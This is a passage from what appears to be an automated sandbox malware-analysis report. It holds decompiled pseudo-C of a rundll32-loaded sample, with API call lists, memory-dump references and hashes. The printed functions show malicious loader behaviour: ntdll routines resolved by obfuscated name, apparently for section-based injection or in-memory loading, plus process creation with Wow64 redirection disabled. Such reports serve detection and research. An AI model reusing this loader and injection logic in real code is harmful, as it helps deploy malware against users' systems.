						_t16 = _t84 + 0x79b8da; // 0x3d736f26
						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t87;
					}
					_t56 =  *0x79a318; // 0x0
					if(_t56 != _t107) {
						_t81 =  *0x79a2d4; // 0x487d5a8
						_t18 = _t81 + 0x79b8b1; // 0x3d706926
						wsprintfA(_t114 + _t117, _t18, _t56);
					}
					if(_a28 != _t107) {
						_t98 = RtlAllocateHeap( *0x79a290, _t107, 0x800);
						if(_t98 != _t107) {
							E00792DD0(GetTickCount());
							_t62 =  *0x79a37c; // 0x5019630
							__imp__(_t62 + 0x40);
							asm("lock xadd [eax], ecx");
							_t66 =  *0x79a37c; // 0x5019630
							__imp__(_t66 + 0x40);
							_t68 =  *0x79a37c; // 0x5019630
							_t115 = E0079624D(1, _t103, _t117,  *_t68);
							asm("lock xadd [eax], ecx");
							if(_t115 != _t107) {
								StrTrimA(_t115, 0x7992ac);
								_push(_t115);
								_t108 = E007921C1();
								_v4 = _t108;
								if(_t108 != 0) {
									 *_t115 = 0;
									__imp__(_t98, _a8);
									_t109 = __imp__;
									 *_t109(_t98, _t108);
									 *_t109(_t98, _t115);
									_t78 = E00791032(0xffffffffffffffff, _t98, _v12, _v8);
									_v40 = _t78;
									if(_t78 != 0 && _t78 != 0x10d2) {
										E00791492();
									}
									HeapFree( *0x79a290, 0, _v24);
								}
								HeapFree( *0x79a290, 0, _t115);
								_t107 = 0;
							}
							HeapFree( *0x79a290, _t107, _t98);
						}
						HeapFree( *0x79a290, _t107, _a20);
					}
					HeapFree( *0x79a290, _t107, _t117);
				}
				_t27 =  &_v16; // 0x796020
				return  *_t27;
			}

0x00796efc
0x00796f10
0x00796f12
0x00796f20
0x00796f24
0x00796f2c
0x00796f34
0x00796f34
0x00796f36
0x00796f42
0x00796f51
0x00796f56
0x00796f59
0x00796f5e
0x00796f61
0x00796f66
0x00796f69
0x00796f75
0x00796f82
0x00796f84
0x00796f8a
0x00796f8f
0x00796f9a
0x00796f9c
0x00796f9f
0x00796fa5
0x00796fa7
0x00796fb0
0x00796fbb
0x00796fbd
0x00796fc0
0x00796fc0
0x00796fc2
0x00796fc9
0x00796fce
0x00796fdb
0x00796fdd
0x00796fe2
0x00796ff0
0x00796ff2
0x00796ff7
0x00796ffc
0x00796fff
0x00797004
0x0079700f
0x00797011
0x00797014
0x00797014
0x00797016
0x00797029
0x0079702d
0x00797032
0x00797036
0x00797039
0x0079703e
0x00797049
0x0079704b
0x0079704e
0x0079704e
0x00797050
0x00797057
0x0079705a
0x0079705f
0x00797069
0x0079706b
0x00797072
0x0079708a
0x0079708e
0x0079709a
0x0079709f
0x007970a8
0x007970b9
0x007970bd
0x007970c6
0x007970cc
0x007970d9
0x007970e6
0x007970ec
0x007970f4
0x007970fa
0x00797100
0x00797104
0x00797108
0x0079710e
0x00797112
0x00797119
0x00797120
0x00797124
0x0079712f
0x00797136
0x0079713a
0x00797143
0x00797143
0x00797154
0x00797154
0x00797163
0x00797169
0x00797169
0x00797173
0x00797173
0x00797184
0x00797184
0x00797192
0x00797192
0x00797198
0x007971a2

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 00796F1A
GetTickCount.KERNEL32 ref: 00796F2E
wsprintfA.USER32 ref: 00796F7D
wsprintfA.USER32 ref: 00796F9A
wsprintfA.USER32 ref: 00796FBB
wsprintfA.USER32 ref: 00796FD9
wsprintfA.USER32 ref: 00796FEE
wsprintfA.USER32 ref: 0079700F
wsprintfA.USER32 ref: 00797049
wsprintfA.USER32 ref: 00797069
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00797084
GetTickCount.KERNEL32 ref: 00797094
RtlEnterCriticalSection.NTDLL(050195F0), ref: 007970A8
RtlLeaveCriticalSection.NTDLL(050195F0), ref: 007970C6

Part of subcall function 0079624D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,007970D9,00000000,05019630), ref: 00796278
Part of subcall function 0079624D: lstrlen.KERNEL32(00000000,?,00000000,007970D9,00000000,05019630), ref: 00796280
Part of subcall function 0079624D: strcpy.NTDLL ref: 00796297
Part of subcall function 0079624D: lstrcat.KERNEL32(00000000,00000000), ref: 007962A2
Part of subcall function 0079624D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,007970D9,?,00000000,007970D9,00000000,05019630), ref: 007962BF

StrTrimA.SHLWAPI(00000000,007992AC,00000000,05019630), ref: 007970F4

Part of subcall function 007921C1: lstrlen.KERNEL32(050187FA,00000000,00000000,00000000,00797100,00000000), ref: 007921D1
Part of subcall function 007921C1: lstrlen.KERNEL32(?), ref: 007921D9
Part of subcall function 007921C1: lstrcpy.KERNEL32(00000000,050187FA), ref: 007921ED
Part of subcall function 007921C1: lstrcat.KERNEL32(00000000,?), ref: 007921F8

lstrcpy.KERNEL32(00000000,?), ref: 00797112
lstrcat.KERNEL32(00000000,00000000), ref: 00797120
lstrcat.KERNEL32(00000000,00000000), ref: 00797124
HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00797154
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00797163
HeapFree.KERNEL32(00000000,00000000,00000000,05019630), ref: 00797173
HeapFree.KERNEL32(00000000,?), ref: 00797184
HeapFree.KERNEL32(00000000,00000000), ref: 00797192

Strings

`y, xrefs: 00797198

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
String ID: `y
API String ID: 1837416118-2334670285
Opcode ID: 325fd3f0d217e2ae3f8070b43a976c5f089d9586a39d9b7304452725f95577c9
Instruction ID: a1fc78aef23a93e1320d0c215c9de5db5c68628fbadbfdaa920260f497b99904
Opcode Fuzzy Hash: 325fd3f0d217e2ae3f8070b43a976c5f089d9586a39d9b7304452725f95577c9
Instruction Fuzzy Hash: 72719072501205BFD721DB6CED89E5777ECFB88300B058516F959C3221E73EA806DBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00795927, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E00795927(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x79a38c; // 0x5019ba0
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E00794E1B(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x7991ac;
				}
				_t46 = E007942F0(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E00796837(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x79a2d4; // 0x487d5a8
						_t16 = _t75 + 0x79baa8; // 0x530025
						 *0x79a138(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E00794E1B(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x7991b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E00796837(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E007950CA(_v20);
						} else {
							_t66 =  *0x79a2d4; // 0x487d5a8
							_t31 = _t66 + 0x79bbc8; // 0x73006d
							 *0x79a138(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E007950CA(_v12);
				}
				return _v24;
			}

0x0079592f
0x00795935
0x0079593c
0x00795942
0x00795946
0x0079594a
0x0079594d
0x00795954
0x00795957
0x00795959
0x00795959
0x00795962
0x00795969
0x0079596c
0x00795972
0x0079597c
0x00795985
0x0079598c
0x007959a5
0x007959ac
0x007959af
0x007959b8
0x007959c1
0x007959d2
0x007959db
0x007959df
0x007959e3
0x007959ea
0x007959ed
0x007959ef
0x007959ef
0x007959f9
0x00795a02
0x00795a09
0x00795a21
0x00795a25
0x00795a62
0x00795a27
0x00795a2a
0x00795a32
0x00795a43
0x00795a4f
0x00795a57
0x00795a5b
0x00795a5b
0x00795a25
0x00795a6a
0x00795a6f
0x00795a76

APIs

GetTickCount.KERNEL32 ref: 0079593C
lstrlen.KERNEL32(?,80000002,00000005), ref: 0079597C
lstrlen.KERNEL32(00000000), ref: 00795985
lstrlen.KERNEL32(00000000), ref: 0079598C
lstrlenW.KERNEL32(80000002), ref: 00795999
lstrlen.KERNEL32(?,00000004), ref: 007959F9
lstrlen.KERNEL32(?), ref: 00795A02
lstrlen.KERNEL32(?), ref: 00795A09
lstrlenW.KERNEL32(?), ref: 00795A10

Part of subcall function 007950CA: RtlFreeHeap.NTDLL(00000000,00000000,00794239,00000000,00000001,?,00000000,?,?,?,00796B8D,00000000,?,00000001), ref: 007950D6

Strings

$yy, xrefs: 007959D2, 00795A43

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID: $yy
API String ID: 2535036572-388054025
Opcode ID: 4ab5ceb294597f2f5e92062f8b0af1a935334f20304e1edc550eca0619d4278c
Instruction ID: a392af4ca02dae5d235317394b2d8dbebb5d440b165fc1387b066bce3be4b902
Opcode Fuzzy Hash: 4ab5ceb294597f2f5e92062f8b0af1a935334f20304e1edc550eca0619d4278c
Instruction Fuzzy Hash: 0B415972800219FFCF12AFA8ED09D9E7BB5FF48314F054155EE04A7221D73A9A15EB94

Uniqueness

Uniqueness Score: -1.00%

Function 007951A8, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E007951A8(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t39;
				intOrPtr _t43;
				intOrPtr _t50;
				void* _t52;
				intOrPtr _t53;
				void* _t61;
				intOrPtr* _t66;
				intOrPtr* _t73;
				intOrPtr* _t76;

				_t71 =  *((intOrPtr*)(__eax + 0x14));
				_t39 = E00794F5A(__ecx,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x14)) + 0xc)),  &_v12,  &_v16);
				_v8 = _t39;
				if(_t39 != 0) {
					L12:
					return _v8;
				}
				E007977A4( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
				_t43 = _v12(_v12);
				_v8 = _t43;
				if(_t43 == 0 && ( *0x79a2b8 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t50 =  *0x79a2d4; // 0x487d5a8
					_t18 = _t50 + 0x79b4a3; // 0x73797325
					_t52 = E00796343(_t18);
					_v12 = _t52;
					if(_t52 == 0) {
						_v8 = 8;
					} else {
						_t53 =  *0x79a2d4; // 0x487d5a8
						_t20 = _t53 + 0x79b770; // 0x5018d18
						_t21 = _t53 + 0x79b0af; // 0x4e52454b
						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
						if(_t66 == 0) {
							_v8 = 0x7f;
						} else {
							_t73 = __imp__;
							_v108 = 0x44;
							 *_t73(0);
							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
							 *_t73(1);
							if(_t61 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x79a290, 0, _v12);
					}
				}
				_t76 = _v16;
				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
				E007950CA(_t76);
				goto L12;
			}

0x007951b1
0x007951bf
0x007951c8
0x007951cb
0x007952dd
0x007952e4
0x007952e4
0x007951da
0x007951e2
0x007951e7
0x007951ea
0x007951ff
0x00795205
0x00795206
0x00795209
0x0079520f
0x00795212
0x00795217
0x0079521f
0x00795226
0x0079522d
0x00795230
0x007952c4
0x00795236
0x00795236
0x0079523b
0x00795242
0x00795256
0x0079525a
0x007952ab
0x0079525c
0x0079525c
0x00795263
0x0079526a
0x00795282
0x00795288
0x0079528c
0x007952a6
0x0079528e
0x00795297
0x0079529c
0x0079529c
0x0079528c
0x007952bc
0x007952bc
0x00795230
0x007952cb
0x007952d4
0x007952d8
0x00000000

APIs

Part of subcall function 00794F5A: GetModuleHandleA.KERNEL32(4C44544E,00000020,00000001,00000000,00000000,?,?,?,007951C4,?,?,?,?,00000000,00000000), ref: 00794F7F
Part of subcall function 00794F5A: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00794FA1
Part of subcall function 00794F5A: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00794FB7
Part of subcall function 00794F5A: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00794FCD
Part of subcall function 00794F5A: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00794FE3
Part of subcall function 00794F5A: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00794FF9

memset.NTDLL ref: 00795212

Part of subcall function 00796343: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,0079522B,73797325), ref: 00796354
Part of subcall function 00796343: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 0079636E

GetModuleHandleA.KERNEL32(4E52454B,05018D18,73797325), ref: 00795249
GetProcAddress.KERNEL32(00000000), ref: 00795250
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 0079526A
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00795288
CloseHandle.KERNEL32(00000000), ref: 00795297
CloseHandle.KERNEL32(?), ref: 0079529C
GetLastError.KERNEL32 ref: 007952A0
HeapFree.KERNEL32(00000000,?), ref: 007952BC

Strings

0y, xrefs: 007951A8

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
String ID: 0y
API String ID: 91923200-313420791
Opcode ID: a68e3e69c4cf1c9d5e9cc84e994444d745255a3fb629ac8a0b50f826c03dbde7
Instruction ID: 7cf7a822715827c8120b667be0389318708ddb8009b4d7bafde52c1cff502c6c
Opcode Fuzzy Hash: a68e3e69c4cf1c9d5e9cc84e994444d745255a3fb629ac8a0b50f826c03dbde7
Instruction Fuzzy Hash: 68314C71901629FFDF119BE8EC48E9EBFB8FF48300F108056E605A3121D779AA46DB90

Uniqueness

Uniqueness Score: -1.00%

Function 007973C3, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E007973C3(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				void* _t25;
				void* _t26;
				signed int* _t27;
				signed short* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x79a2c8; // 0xbd092303
				_t1 =  &_a4; // 0x7930e1
				_t32 =  *_t1;
				_a4 = _t6 ^ 0xd05b5869;
				_t8 =  *0x79a2d4; // 0x487d5a8
				_t3 = _t8 + 0x79b8a2; // 0x61636f4c
				_t25 = 0;
				_t30 = E00792DEA(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x79a2f8, 1, 0, _t30);
					E007950CA(_t30);
				}
				_t12 =  *0x79a2b4; // 0x4000000a
				if(_t12 != 6 || _t12 < 2) {
					if( *_t32 != 0 && E0079513E() == 0) {
						_t28 =  *0x79a120( *_t32, 0x20);
						if(_t28 != 0) {
							 *_t28 =  *_t28 & 0x00000000;
							_t28 =  &(_t28[1]);
						}
						_t31 = E00796BE1(0, _t28,  *_t32, 0);
						if(_t31 == 0) {
							if(_t25 == 0) {
								goto L21;
							}
							_t31 = WaitForSingleObject(_t25, 0x4e20);
							if(_t31 == 0) {
								goto L19;
							}
						}
					}
					goto L11;
				} else {
					L11:
					_t27 = _a8;
					if(_t27 != 0) {
						 *_t27 =  *_t27 | 0x00000001;
					}
					_t31 = E007951A8(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t27 != 0 && _t31 != 0) {
						 *_t27 =  *_t27 & 0xfffffffe;
					}
					L19:
					if(_t25 != 0) {
						CloseHandle(_t25);
					}
					L21:
					return _t31;
				}
			}

0x007973c4
0x007973cb
0x007973cb
0x007973d5
0x007973d9
0x007973df
0x007973ec
0x007973f3
0x007973f7
0x00797409
0x0079740b
0x0079740b
0x00797410
0x00797417
0x00797422
0x00797438
0x0079743c
0x0079743e
0x00797443
0x00797443
0x00797450
0x00797454
0x00797458
0x00000000
0x00000000
0x00797466
0x0079746a
0x00000000
0x00000000
0x0079746a
0x00797454
0x00000000
0x0079746c
0x0079746c
0x0079746c
0x00797472
0x00797474
0x00797474
0x0079747e
0x00797482
0x00797494
0x00797494
0x00797498
0x0079749e
0x0079749e
0x007974a1
0x007974a3
0x007974a6
0x007974a6
0x007974ad
0x007974b3
0x007974b3

APIs

Part of subcall function 00792DEA: lstrlen.KERNEL32(E8FA7DD7,00000000,63699BC3,00000027,00000000,05019C98,745EC740,007955DE,?,63699BC3,E8FA7DD7,00000000,?,?,?,007955DE), ref: 00792E20
Part of subcall function 00792DEA: lstrcpy.KERNEL32(00000000,00000000), ref: 00792E44
Part of subcall function 00792DEA: lstrcat.KERNEL32(00000000,00000000), ref: 00792E4C

CreateEventA.KERNEL32(0079A2F8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,007930E1,?,?,?), ref: 00797402

Part of subcall function 007950CA: RtlFreeHeap.NTDLL(00000000,00000000,00794239,00000000,00000001,?,00000000,?,?,?,00796B8D,00000000,?,00000001), ref: 007950D6

WaitForSingleObject.KERNEL32(00000000,00004E20,0y,00000000,?,00000000,?,007930E1,?,?,?,?,?,?,?,0079211B), ref: 00797460
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,007930E1,?,?,?), ref: 0079748E
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,007930E1,?,?,?), ref: 007974A6

Strings

0y, xrefs: 007973CB, 0079742F, 00797446
xy, xrefs: 00797432

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID: 0y$xy
API String ID: 73268831-2511391153
Opcode ID: 2f57df5b2ee0e212b09852f98e25e93a81779754af19a1ee8049484a173084d2
Instruction ID: 4f6a1cd054d7d0d24c39447f6fd7245e1f26bff0ef571fe5e6879b3359e84806
Opcode Fuzzy Hash: 2f57df5b2ee0e212b09852f98e25e93a81779754af19a1ee8049484a173084d2
Instruction Fuzzy Hash: D5213732515752ABDF255B68BC49B577AE8BF88B10F108225FE019B263D77DDC01C784

Uniqueness

Uniqueness Score: -1.00%

Function 00796BE1, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E00796BE1(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t18;
				intOrPtr _t22;
				intOrPtr _t23;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr* _t32;

				_t30 = __edi;
				_t29 = _a4;
				_t31 = __eax;
				_t18 = E00792902(_t29, __edi, __eax);
				_a4 = _t18;
				if(_t18 != 0) {
					memset( &_v60, 0, 0x38);
					_t22 =  *0x79a2d4; // 0x487d5a8
					_v64 = 0x3c;
					if(_a8 == 0) {
						_t7 = _t22 + 0x79b4c8; // 0x70006f
						_t23 = _t7;
					} else {
						_t6 = _t22 + 0x79b8f8; // 0x750072
						_t23 = _t6;
					}
					_v36 = _t31;
					_t32 = __imp__;
					_v52 = _t23;
					_v48 = _t29;
					_v44 = _t30;
					 *_t32(0);
					_push( &_v64);
					if( *0x79a100() != 0) {
						_a4 = _a4 & 0x00000000;
					} else {
						_a4 = GetLastError();
					}
					 *_t32(1);
				}
				return _a4;
			}

0x00796be1
0x00796be8
0x00796bec
0x00796bf1
0x00796bf8
0x00796bfb
0x00796c05
0x00796c0a
0x00796c16
0x00796c1d
0x00796c27
0x00796c27
0x00796c1f
0x00796c1f
0x00796c1f
0x00796c1f
0x00796c2d
0x00796c30
0x00796c38
0x00796c3b
0x00796c3e
0x00796c41
0x00796c46
0x00796c4f
0x00796c5c
0x00796c51
0x00796c57
0x00796c57
0x00796c62
0x00796c62
0x00796c6a

APIs

Part of subcall function 00792902: SysAllocString.OLEAUT32(?), ref: 0079295E
Part of subcall function 00792902: SysAllocString.OLEAUT32(0070006F), ref: 00792972
Part of subcall function 00792902: SysAllocString.OLEAUT32(00000000), ref: 00792984
Part of subcall function 00792902: SysFreeString.OLEAUT32(00000000), ref: 007929E8

memset.NTDLL ref: 00796C05
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00796C41
GetLastError.KERNEL32 ref: 00796C51
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00796C62

Strings

<, xrefs: 00796C16
qyy, xrefs: 00796C47

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
String ID: <$qyy
API String ID: 593937197-263492531
Opcode ID: bc15a4ca706f6e487fd405f4ddcd3b97aef270ce91d0d37ddb6cd496317b909a
Instruction ID: 50ddc343eb43442081f3b170c9c9a1ab342db31a1d5a3ff21ea53d92dc883335
Opcode Fuzzy Hash: bc15a4ca706f6e487fd405f4ddcd3b97aef270ce91d0d37ddb6cd496317b909a
Instruction Fuzzy Hash: 67110971900218ABDF00DFA9EC89BD97BB8EB08390F14811AF909E7251D778E545CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00792902, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 0079295E
SysAllocString.OLEAUT32(0070006F), ref: 00792972
SysAllocString.OLEAUT32(00000000), ref: 00792984
SysFreeString.OLEAUT32(00000000), ref: 007929E8
SysFreeString.OLEAUT32(00000000), ref: 007929F7
SysFreeString.OLEAUT32(00000000), ref: 00792A02

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 5a3ad0008b687a05919781070ef316c388e607a9b1b92fb75151ea778f1449ca
Instruction ID: 7c55cfb511bbf9dc0181c952e01738f2d966199278ce157a9925eff6e2391224
Opcode Fuzzy Hash: 5a3ad0008b687a05919781070ef316c388e607a9b1b92fb75151ea778f1449ca
Instruction Fuzzy Hash: C1311B32900609AFDF01EFBCD849A9EB7B6AF49311F148465ED10FB121DB79AD06CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00794F5A, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00794F5A(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E00796837(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x79a2d4; // 0x487d5a8
					_t1 = _t23 + 0x79b11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x79a2d4; // 0x487d5a8
					_t2 = _t26 + 0x79b792; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E007950CA(_t54);
					} else {
						_t30 =  *0x79a2d4; // 0x487d5a8
						_t5 = _t30 + 0x79b77f; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x79a2d4; // 0x487d5a8
							_t7 = _t33 + 0x79b74e; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x79a2d4; // 0x487d5a8
								_t9 = _t36 + 0x79b72e; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x79a2d4; // 0x487d5a8
									_t11 = _t39 + 0x79b7a2; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E00794248(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x00794f69
0x00794f6d
0x0079502f
0x00794f73
0x00794f73
0x00794f78
0x00794f8b
0x00794f8d
0x00794f92
0x00794f9a
0x00794fa1
0x00794fa5
0x00794fa8
0x00795027
0x00795028
0x00794faa
0x00794faa
0x00794faf
0x00794fb7
0x00794fbb
0x00794fbe
0x00000000
0x00794fc0
0x00794fc0
